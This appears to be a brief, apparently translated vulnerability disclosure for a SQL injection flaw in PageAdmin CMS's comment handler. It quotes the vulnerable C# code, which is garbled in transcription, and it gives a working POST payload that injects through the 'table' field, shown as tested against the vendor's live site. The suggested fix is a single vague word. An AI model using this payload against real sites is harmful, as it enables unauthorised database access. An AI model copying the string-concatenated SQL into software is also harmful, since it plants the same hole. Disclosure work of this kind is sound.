Pageadmin SQL injection vulnerability and repair

Pageadmin SQL injection vulnerability and repair
/E/aspx/get_comment.aspx

Protected void Page_Load (Object src, EventArgs e) {string SQL; OleDbCommand comm; Conn theconn = new Conn (); if (Request. form ["post"] = "add") {IsMember = Request. form ["ismember"]; if (IsMember = "0") {Md5 JM = new Md5 (); if (Session ["YZM"] = null) {Response. write ("yzm error"); Response. end ();} else if (Request. form ["code"]! = Session ["YZM"]. toString () {Response. write ("yzm error"); Response. end () ;}} Table = Request. form ["table"]; // obtain the parameter DetailId = Request. form ["id"]; string UserName = Request. form ["username"]; string Password = Request. form ["code"]; string Quote = Request. form ["quote"]; string Content = Request. form ["content"]; string Checked = Request. form ["checked"]; Checked = "0 "? "1": "0"; string SiteId = Request. form ["siteid"]; LoginUserName = ""; IP = GetClientIP (); if (Content = "" |! IsNum (Checked) |! IsNum (DetailId) |! IsNum (SiteId) |! IsNum (IsMember) {Response. write ("input error"); Response. end () ;}else {Check_Post (); conn = new OleDbConnection (theconn. constr (); conn. open (); // Get_Set (int. parse (SiteId); Check_TimeLimit (); // check interval; if (Comment_MaxLength! = 0 & Content. length> Comment_MaxLength) // check the maximum character {conn. close (); Response. write ("maxleng_limit," + Comment_MaxLength); Response. end () ;}check_forbid (Content); // check the forbidden keyword Content = Replace_String (Content); // replace UserName = Replace_String (UserName ); // replace // process the content if (IsMember = "1") // check the user. Only 1 is detected. This skips the {if (Request. cookies ["Member"]! = Null) {Member_Valicate MCheck = new Member_Valicate (); MCheck. member_Check (); UserName = MCheck. _ UserName;} else {Check_Member (UserName, Password); // check username and Password} SQL = "insert into pa_comments (site_id, thetable, [detail_id], [UserName], [content], [quote], [checked], [ip], thedate, [ismember]) values ("+ int. parse (SiteId) + ", '" + SQL _Format (Table) + "'," + int. parse (DetailId) + ", '" + SQL _Format (UserName) + "', '" + SQL _Format (Content) + "', '" + SQL _Format (Quote) + "', "+ int. parse (Checked) + ", '" + IP + "', '" + DateTime. now + "'," + int. parse (IsMember) + ")"; comm = new OleDbCommand (SQL, conn); comm. executeNonQuery (); SQL = "update" + Table + "set comments = comments + 1 where id =" + DetailId; // table injection comm = new OleDbCommand (SQL, conn); comm. executeNonQuery (); Response. write (Checked); conn. close (); Response. end ();}

 

Test method I used the official site to test the http://www.pageadmin.net/e/aspx/get_comments.aspx POST submit post = add & table = pa_comments set ip = 1 where 1 = 1 and 1 = user -- & id = 1 & siteid = 1 & ismember = 12 & checked = 1 & content = 1 Solution:Filter ~